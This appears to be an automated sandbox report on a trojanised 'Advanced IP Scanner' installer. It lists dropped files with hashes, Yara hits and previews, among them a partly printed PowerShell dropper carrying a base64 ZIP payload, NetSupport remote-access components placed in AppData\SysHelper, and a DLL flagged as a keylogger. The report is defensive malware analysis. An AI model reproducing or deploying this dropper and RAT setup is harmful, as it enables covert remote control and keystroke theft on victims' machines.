                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3329597
                                                                                                                      Entropy (8bit):6.563292325267208
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:AdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQu3334PK:yJYVM+LtVt3P/KuG2ONG9iqLRQu3334S
                                                                                                                      MD5:3EAAE4BAD7C2BD8319CDCDFCAAC03B7E
                                                                                                                      SHA1:3FA168131A590D0EB7C80B6F321304A2070985E6
                                                                                                                      SHA-256:938C1F61125871F4A0B8F2382F29C420443DD755F01A596996E444A360CA21A3
                                                                                                                      SHA-512:98D76D607D8B2D44B53B8926BD1C58E7249D63C80066C34D420D0CCA3A9190072AAD21A4C073E12AE4F70086F8516621B6D2B3170D9519C1F51EB46B888CEAC4
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................@3...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):80128
                                                                                                                      Entropy (8bit):6.906674531653877
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
                                                                                                                      MD5:1B171F9A428C44ACF85F89989007C328
                                                                                                                      SHA1:6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
                                                                                                                      SHA-256:9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
                                                                                                                      SHA-512:99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Thu Oct 31 17:01:02 2024, mtime=Thu Oct 31 17:01:02 2024, atime=Fri Apr 29 17:13:52 2022, length=1681960, window=hide
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1358
                                                                                                                      Entropy (8bit):4.574105269417947
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:8mN/n72ELdOEGgaG2INLsUn4AkS/uf/aoT5dcaGTUnKxdcaG7jaGOalUUDnqyFm:8mN/n1LdO8a3IKKfryCydcaqKKdca6jH
                                                                                                                      MD5:6B19FCDE4C4FD8B59D60AAFD762C9BF1
                                                                                                                      SHA1:801D2099342B7F6EBF66BEC3A096DA7417FAEA0A
                                                                                                                      SHA-256:D4687431DA01AFA7F877AA387CDEB31D20951AC7FECC7A2C6712E470810C3420
                                                                                                                      SHA-512:91E3399F43338F547ED7CA8FF3E6B5BC7980BA521B16633E4914622C175C3881AED00306FED2643AC533378A7874ADE60043DE154678804F523489CD9319EB45
                                                                                                                      Malicious:false
                                                                                                                      Preview:L..................F.... ....;+.+...b2.+...0s..[..(............................P.O. .:i.....+00.../C:\.....................1....._Y....PROGRA~2.........O.I_Y......................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....p.1....._Y$...ADVANC~1..X......_Y"._Y$...............................A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.....|.2.(....T.. .ADVANC~1.EXE..`......_Y"._Y"..............................a.d.v.a.n.c.e.d._.i.p._.s.c.a.n.n.e.r...e.x.e.......q...............-.......p............EDn.....C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe..Q.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.\.a.d.v.a.n.c.e.d._.i.p._.s.c.a.n.n.e.r...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.?.%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.\.A.d.v.a.n.c.e.d._.I.P._.S.c.a.n.n.e.r...i.
                                                                                                                      Process:C:\Users\user\AppData\Roaming\SysHelper\client32.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):15
                                                                                                                      Entropy (8bit):2.7329145639793984
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:QJgTG:QkG
                                                                                                                      MD5:8AB0D91EF06123198FFAC30AD08A14C7
                                                                                                                      SHA1:46D83BB84F74D8F28427314C6084CC9AFE9D1533
                                                                                                                      SHA-256:DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
                                                                                                                      SHA-512:1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
                                                                                                                      Malicious:false
                                                                                                                      Preview:32.7767,-96.797
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1772
                                                                                                                      Entropy (8bit):5.466044059530951
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:QS1WSU4xymI4RfoUeW+mZ9tlNWR831NTxB9001dqZ0:QALHxvIIwLmZXW8nHS01YZ0
                                                                                                                      MD5:539FE6FDAF4F97ECFB3DF3EEB3A99FAA
                                                                                                                      SHA1:BEFDE31A9A6D89460B54B5E465F0BE299EECFE9E
                                                                                                                      SHA-256:F90784416A7BD930799A1A357FFDD9A1648C08FCFA0BBB5878B8093E1E4E0E31
                                                                                                                      SHA-512:44C9C85360816D5DF18F714DBA43156C26BA707E4DCC825E7B2CD64A71D6A0DE5B71A7129269532662732372D20AD8A0546DE6D9783421FDC586172F8D95D944
                                                                                                                      Malicious:false
                                                                                                                      Preview:@...e...........S.....................@.5.......................P................1]...E.....'.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                      Process:C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3305472
                                                                                                                      Entropy (8bit):6.57660301759331
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:IdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQu3334PV:6JYVM+LtVt3P/KuG2ONG9iqLRQu3334d
                                                                                                                      MD5:597637EDBEBB79D482E762E238209BCD
                                                                                                                      SHA1:840091CFDFB0C47AAFD59F127C593DDB1B857C12
                                                                                                                      SHA-256:592BEDCC2C1CD3491ED40B3CDB8DD5CA6D248598BDF871145C300028EADAC4CD
                                                                                                                      SHA-512:80361FF1154EE2BFFA5B48DAB886E5040536755734CCC94AB170166C5E4C93DBE7052D19DF14DA162F92D2D8390B2C3B7D49416C41C200BFDA12C4030AB458EE
                                                                                                                      Malicious:true
                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................@3...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6144
                                                                                                                      Entropy (8bit):4.720366600008286
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                      Malicious:false
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:ASCII text, with very long lines (65333), with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3035666
                                                                                                                      Entropy (8bit):5.9992842391395556
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:We6uUAecyy1q8n4RkErBHwnnDkKKr9r6riooJc98haMA:5
                                                                                                                      MD5:FBD2C66EE39FEA4BDF9ED9F3C0D8AD28
                                                                                                                      SHA1:E3C517FA670A7A895997989E83EE68430EB82714
                                                                                                                      SHA-256:A18C7CDA2F17E7819EA29F62F288ACF92360B29B8B2B7C431F3A7E7752352DAF
                                                                                                                      SHA-512:556926562836D1DE36C0EACF3494F089996A5896DCE1B0EC6DBFB2F1274CD964B378F128401BFD156D295C3D5BF52200F96193DE6B78A4EE49ED2B9560502E76
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1, Author: Joe Security
                                                                                                                      Preview:$ErrorActionPreference = "Stop";..Set-Location $Env:AppData;..$destinationPath = "$Env:AppData\SysHelper";..if (Test-Path $destinationPath) {.. Remove-Item "$Env:AppData\temp_base64.txt";.. Exit;..};..$base64Content = "UEsDBBQACAAIAPAw5zYAAAAAAAAAAEgBAAAMACAAbnNrYmZsdHIuaW5mVVQNAAd0A49GGaUPZ3QDj0Z1eAsAAQQAAAAABAAAAABVj8GKwkAMhu8D8w5BPG4LHjxJTyu9KEVo2R6WRaZORoPjDGRGi2+/01oLhhxCkv//kg24cO2MjZyTM1JsUkJVww6fnVesoSQbkYfuNGwuFCDtgiGLqQhRWRsgXhDabQklqxv2nq/QkVNMGKSQ4vcHOZB3f1LUdHYq3hmLxbIlp30foGqWCykO7B+kkYuq3g+iFzDLsvlG+PYTEPmNVjH5QjbGqBh581dVk7faJO7upk2N/KATQjE7fs3Vsdcm4Cl+yN/NSb+njhU/p2eSzSpfD/tS/ANQSwcI96jtkdUAAABIAQAAUEsDBBQACAAIAI4MBVcAAAAAAAAAAAMBAAAHACAATlNNLkxJQ1VUDQAHbH3NZGx9zWRsfc1kdXgLAAEEAAAAAAQAAAAALY/RTkIxDIbvm+wd9gLKtoMKml0Chig3xAtDyMkcJSzObukGHt7eM7W9+r82X1NtlBKgBofu44h3XoCAJ7nBuj3nnLjKl+CRCspliHjbZiskZFfxIBNJ3T3qe3kj9Xyi5hOj9EMTtN7tFnRM7HG//439v2hMPlHlFPtE8WrH6zjkwFcrIJDzNVywwfi3jna1fF6v39+mnYAvN5ToLlisVq0EpGKsFpA5Hc6+jlhAQQ4u9pTsZvs668zUzEZ44kCf/Te73OSVHZX2nlUCfgBQSwcIFel
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):93560
                                                                                                                      Entropy (8bit):6.5461580255883876
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
                                                                                                                      MD5:4182F37B9BA1FA315268C669B5335DDE
                                                                                                                      SHA1:2C13DA0C10638A5200FED99DCDCF0DC77A599073
                                                                                                                      SHA-256:A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
                                                                                                                      SHA-512:4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dll, Author: Joe Security
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..in.:n.:n.:g.6:|.:g. :".:g.':J.:g.0:i.:n.:5.:g.):i.:g.1:o.:p.7:o.:g.2:o.:Richn.:........PE..L......U...........!.........j.......S............0.................................5f..............................@*..-...."..P....P..X............D..x)...`..4...p...................................@...............@............................text............................... ..`.rdata..m;.......<..................@..@.data........0......................@....rsrc...X....P.......$..............@..@.reloc..T....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):328056
                                                                                                                      Entropy (8bit):6.754723001562745
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                                                      MD5:2D3B207C8A48148296156E5725426C7F
                                                                                                                      SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                                                      SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                                                      SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\HTCTL32.DLL, Author: Joe Security
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):259
                                                                                                                      Entropy (8bit):5.103526864179364
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:O/oPzQyak4xRPjwxXTkoaydDKHMoEEjLgpW2Mch6IXZNWYpPM/ioUBENLa8l6i7s:XbQyaZR7wxooT8JjjqW2Ma6aNBPM/ioc
                                                                                                                      MD5:866C96BA2823AC5FE70130DFAAA08531
                                                                                                                      SHA1:892A656DA1EA264C73082DA8C6E5F5728ABCB861
                                                                                                                      SHA-256:6A7C99E4BD767433C25D6DF8DF81BAA99C05DD24FA064E45C306FF4D954E1921
                                                                                                                      SHA-512:0DAFC66222BBFCB1558D9845EE4DDEB7A687561B08B86A07B66B120C22952A8082E041D9234D9C69C8ADE5D4DAE894D3F10AFD7BA6DD3F057A08FB5D57C42112
                                                                                                                      Malicious:true
                                                                                                                      Preview:1200..0xaeabfe5c....; NetSupport License File...; Generated on 13:16 - 19/09/2017........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=GFHJJYU43..maxslaves=100000..os2=1..product=10..serial_no=NSM832428..shrink_wrap=0..transport=0..
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18808
                                                                                                                      Entropy (8bit):6.22028391196942
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                                                      MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                                                      SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                                                      SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                                                      SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\PCICHEK.DLL, Author: Joe Security
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3642864
                                                                                                                      Entropy (8bit):6.5156874906689275
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:5fgiLcxYMP9Y7fPUVBS7jNOXhmSTwpa1ycVSENqb:5fhLcxYMePUCjzGS7
                                                                                                                      MD5:214A714EF11C2C91162A9344BF8F2E50
                                                                                                                      SHA1:B87886B6B1E48E5E54E3033BE9A73B67B5A5C282
                                                                                                                      SHA-256:74DFCD891813058B29B0A70EC0A95F31CD5356F175AD3A492DAECBC52542E76F
                                                                                                                      SHA-512:A785D390C7E066628C9894302CA10AC21BA79D9988523D5ABCB960870A39112D01984A86CDE0BCD3862D46D82696E35BA760D96A389C96553ECB1DB9C3A0D97D
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL, Author: Joe Security
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h..........<G.............-..........q............q.....q......-.Q....,.|.....................Rich............PE..L.....3V...........!.................^.......................................08.......7.....................................t........ ..P............x7.......6.........................................@...................8x..`....................text............................... ..`.rdata..............................@..@.data....%..........................@....tls.................t..............@....hhshare.............v..............@....rsrc...P.... .......x..............@..@.reloc...,....6......J5.............@..B................................................................................................................................................................................................................
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):459760
                                                                                                                      Entropy (8bit):6.678291257338415
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:suqhtvbez3wj9AP8Ah0DAmlse99fow3/qkxf5iJg0nTUtnTvm:s3htk/eHoJktEKITUFTvm
                                                                                                                      MD5:69F72AD2DAD99FF0FBC7F2C671523014
                                                                                                                      SHA1:8AAAB0955014B89CA794A51DD527D3AFE6F38A94
                                                                                                                      SHA-256:23F17CC168CC82B8AE16F3FC041D4465E1B12E66DCAC1713F582F99303A740DD
                                                                                                                      SHA-512:EA18D92790F52405027666B7501CF908426B9B57FEC4157A45D86387D50324E414644245269DC1A0567B27C6C4B7C4B323D692BF449ADD4797DFCD7101531349
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLL, Author: Joe Security
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..~..L~..L~..L..pLi..L~..L..Lw.}Ls..L..DL..L..EL6..L..uL...L..tL...L..sL...LRich~..L................PE..L....J.`...........!.....>...r......n7.......P...............................P......1.....@..........................Q..m....D..........@................O.......I...R..............................P&..@............P...............................text...l=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....`.......H..............@....rsrc...@............`..............@..@.reloc...J.......L...h..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):121304
                                                                                                                      Entropy (8bit):6.150456878585649
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:Wm8j0+RvW6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDJg:WbpvWiLniepfxP91/bQxEj
                                                                                                                      MD5:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                      SHA1:E533F2318D232EF3E1B22BDD1D6B61C081C6D6EB
                                                                                                                      SHA-256:AAA12A1AD8C748FBFD4C8F2E5023EC3481B18CB088B28737FC7E665163CFF41D
                                                                                                                      SHA-512:4C338E4F87F5AC9E9339E663739B021F06D8EE48F7A5981CCDF85029888964E3C416331C7EC791933A6B3D56EC44BB3719A38039F625A25B86BA0264E3D2D609
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe, Author: Joe Security
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H..&...&...&.<.{...&...'...&.@."...&...-...&.x. ...&.Rich..&.........PE..L...m1.Q............................ ........ ....@..........................................................................0..<....@..pu..........H................ ..............................................X0...............................text............................... ..`.rdata....... ....... ..............@..@.idata.......0.......0..............@....rsrc...pu...@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):638
                                                                                                                      Entropy (8bit):5.396410176198281
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:kA2yTumGSqX4Ba/vpVSxOZ7zH+SHCPfu8AeCYubluxWkdcJPPGY:kttm18mxONeSorbu8eJ3f
                                                                                                                      MD5:74BEF725496CD35EEB6F6B94E1EDDDFD
